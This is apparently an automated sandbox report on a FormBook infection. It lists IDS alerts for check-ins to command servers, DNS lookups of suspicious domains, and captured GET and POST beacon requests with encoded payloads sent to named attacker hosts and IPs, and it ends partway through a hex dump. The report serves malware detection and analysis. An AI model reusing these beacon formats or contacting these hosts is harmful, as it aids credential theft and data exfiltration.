Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49698 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49698 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49701 -> 209.74.80.150:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49700 -> 209.74.80.150:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49730 -> 172.67.190.25:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49730 -> 172.67.190.25:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49731 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49704 -> 38.181.35.142:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49737 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49740 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49702 -> 209.74.80.150:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49702 -> 209.74.80.150:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49709 -> 104.21.85.156:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49714 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49714 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49719 -> 104.21.41.226:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49729 -> 172.67.190.25:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49695 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49718 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49718 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49722 -> 104.21.41.226:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49722 -> 104.21.41.226:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49699 -> 209.74.80.150:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49721 -> 104.21.41.226:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49717 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49712 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49733 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49727 -> 172.67.190.25:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49710 -> 104.21.85.156:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49710 -> 104.21.85.156:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49741 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49726 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49726 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49738 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49738 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49697 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49723 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49715 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49735 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49732 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49736 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49707 -> 104.21.85.156:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49728 -> 172.67.190.25:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49725 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49739 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49720 -> 104.21.41.226:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49734 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49734 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49742 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49742 -> 13.248.169.48:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.computational360.xyz
Source:	DNS query: www.royalbond.xyz
Source:	DNS query: www.genericagi.xyz
Source:	DNS query: www.031233793.xyz
Source:	DNS query: www.earnpet.xyz

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: HKKFGL-AS-APHKKwaifongGroupLimitedHK HKKFGL-AS-APHKKwaifongGroupLimitedHK

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /tbxt/?Ovj=5zKTLnopaTP&XB_HCj98=Iqu27JV6RtB5rwbWGX5phE4n2DLT8oSC71HEWnCl1r6gTdDm+5MFdqapX6KFcoaemzdW+bJMUEQ6mPDpHKBT398xZqQfA6qNwprZ9MFbDOrA907RJw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.72422.pinkConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /c6g4/?Ovj=5zKTLnopaTP&XB_HCj98=RNZMSqcedGWBg2TZO3dRh8gxMl4f67yslf8Dfsx/arayUyYyOnUvY1yeRgX28wL25sy8+E+PkSfs0QcIoRMa7+Ep4TgIbCy/Whdz+HJQIUOP3GODfw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.wavekeith.mediaConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /bpdk/?XB_HCj98=Qd+AbDlML76Asp7YEEUMi3jx5MAB0lZePBuu7Alv7PtIyWqe0sOmlfN5AzVKPyVHj8GaIG6tBp5tN59gjWFGweQciM6TmQqM3b8hYjvYxJzamxa8oA==&Ovj=5zKTLnopaTP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lifway.lifeConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /m2co/?Ovj=5zKTLnopaTP&XB_HCj98=KkhKztOrouYdO6KpXdVqi4w74F2zq51iuilzw+5EZsUSRbPhfJs15SPe6okTiDbvjrFGHVzshQWoM28L+pgrS7TrEWb8uLBK/BoKOFgcE3pG/Sv96g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zthzzyg.topConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /3p3g/?XB_HCj98=iMhxCdjUV/TrjIIkXbg3gyb2S+3RHNp1b/FvKb0FVvQIbLCrJTzusqU6dF4+LG7IdS8ixPp3hKapNstlr5uZlwjHDLXtsH34mOgz83G0wXnc+A7UuQ==&Ovj=5zKTLnopaTP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.shangaccurate.shopConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /3r3z/?XB_HCj98=YQ8ZZq6XMKPnjz/lNSwfMjGw93OL+pviMm5ivx01j/mQRuIIYB8tvYmmPTqC43FBis8hwv0SAWQcXWoI20kIlvotziku8JDcxKJ5y/6Ti8vF2QPyPQ==&Ovj=5zKTLnopaTP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.computational360.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /eepn/?XB_HCj98=dw5QcprGFkd3XjcdgcT5llgXUNCEbkp5Sxt42+0aBAO22L33GMr9EjFNLPJuM1H8ccFUZjjFPJRZej0JFBBHyvZdymhc3u+Ffs/NOo5yC9hDqVKPFA==&Ovj=5zKTLnopaTP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.royalbond.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /h118/?XB_HCj98=1g7UryuS5x0Wh4uexveTNPsXutMaQd5sn0dp/kTbv45J576FJpAlxx5tgSklMWqt1aN3gixLCN0pen2hBoAX2tQnLa6iWgFHbO+npcYfHtjocWukrQ==&Ovj=5zKTLnopaTP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.conegame.bizConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /vjjz/?Ovj=5zKTLnopaTP&XB_HCj98=sDMMZFCSf8nQmR4N09Z5RvJsFE8m2ymnDkSMZuV+ydBLyXYj1ihO2SPAc2dyEqEjjDD1ouTgtkh5JSFCPscCX+kSnHm7v4yCFgiMG9Lc5zxi11Ps0Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.venturegioballng.funConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /vewx/?XB_HCj98=q2VnHaWrZNtFWK3Rpx5XP+VRBhcMsI/B1qj8hoVqDlE05AGLfggHghSsL/krXljcEHcHk48t2T8TshCsFpmcaUAhM/iANi2vfW1LWLlPwX6RviGe3w==&Ovj=5zKTLnopaTP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.click68vp.storeConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /di53/?Ovj=5zKTLnopaTP&XB_HCj98=tUuxyfOAwGqd7slXY5uuRpInc/u4ii11nx3sKr6ARPyCVgX9LZGvthyJhYnR3R//VHqTuRk3kyGYXUXFIQp+sYVJz1ic3+1BD9TEkmKMdSPHE+b3DQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.genericagi.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /63vw/?XB_HCj98=/AWan37a38wOWEORWzeod94xsxBhFz4VsV6dUjHrMq6Byw1zuDvkYlVbkxhB3tMF41p2F0XVFAXMg5ahqIa68XzOyYjmefsWaXYAG/xSleayxBLtlQ==&Ovj=5zKTLnopaTP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.031233793.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic	HTTP traffic detected: GET /7y0d/?XB_HCj98=gaa/d7/w8ntYI4pClwk7JhxyVWqYn5HdMTYGtcUpuQx6+0Tbn7Ao2cdkUqfgvYYZhG2IlmBJpqbwKiGX0QKIE+pGXBy4J0SlX66GFpLk+UlMnaHM8A==&Ovj=5zKTLnopaTP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.earnpet.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)

Source: global traffic	DNS traffic detected: DNS query: www.72422.pink
Source: global traffic	DNS traffic detected: DNS query: www.credit-agricole.pics
Source: global traffic	DNS traffic detected: DNS query: www.wavekeith.media
Source: global traffic	DNS traffic detected: DNS query: www.lifway.life
Source: global traffic	DNS traffic detected: DNS query: www.zthzzyg.top
Source: global traffic	DNS traffic detected: DNS query: www.rvtapp.com
Source: global traffic	DNS traffic detected: DNS query: www.shangaccurate.shop
Source: global traffic	DNS traffic detected: DNS query: www.computational360.xyz
Source: global traffic	DNS traffic detected: DNS query: www.royalbond.xyz
Source: global traffic	DNS traffic detected: DNS query: www.conegame.biz
Source: global traffic	DNS traffic detected: DNS query: www.venturegioballng.fun
Source: global traffic	DNS traffic detected: DNS query: www.click68vp.store
Source: global traffic	DNS traffic detected: DNS query: www.genericagi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.kissjav.pics
Source: global traffic	DNS traffic detected: DNS query: www.031233793.xyz
Source: global traffic	DNS traffic detected: DNS query: www.earnpet.xyz

Source: unknown

HTTP traffic detected: POST /c6g4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.wavekeith.mediaContent-Length: 197Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeOrigin: http://www.wavekeith.mediaReferer: http://www.wavekeith.media/c6g4/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)Data Raw: 58 42 5f 48 43 6a 39 38 3d 63 50 78 73 52 64 6f 75 4d 48 36 6f 6c 78 69 42 4c 45 77 52 74 4b 67 76 4b 45 30 41 32 50 32 39 37 70 41 4a 66 39 31 66 55 70 61 4a 65 79 31 47 65 69 45 73 5a 57 36 38 55 33 48 74 78 78 62 42 6d 50 37 2f 76 6b 72 73 74 45 2f 6e 2f 52 6b 63 74 6e 51 65 6e 4d 41 4f 77 42 45 6b 4a 68 48 2b 51 41 55 45 71 31 42 77 65 54 47 63 33 47 76 2f 4c 34 30 68 6a 5a 77 75 43 78 58 63 78 31 72 76 7a 45 43 37 2b 6e 33 30 6b 66 44 6b 4d 2b 55 71 79 68 55 72 4c 62 45 7a 63 39 70 68 78 6d 30 6f 62 6f 37 35 67 45 59 78 76 47 61 43 76 4d 39 33 66 4d 49 69 56 47 30 35 76 48 37 6e Data Ascii: XB_HCj98=cPxsRdouMH6olxiBLEwRtKgvKE0A2P297pAJf91fUpaJey1GeiEsZW68U3HtxxbBmP7/vkrstE/n/RkctnQenMAOwBEkJhH+QAUEq1BweTGc3Gv/L40hjZwuCxXcx1rvzEC7+n30kfDkM+UqyhUrLbEzc9phxm0obo75gEYxvGaCvM93fMIiVG05vH7n

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 15 Apr 2025 10:04:14 GMTContent-Type: text/plainContent-Length: 0Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:04:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:04:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:04:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 10:05:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 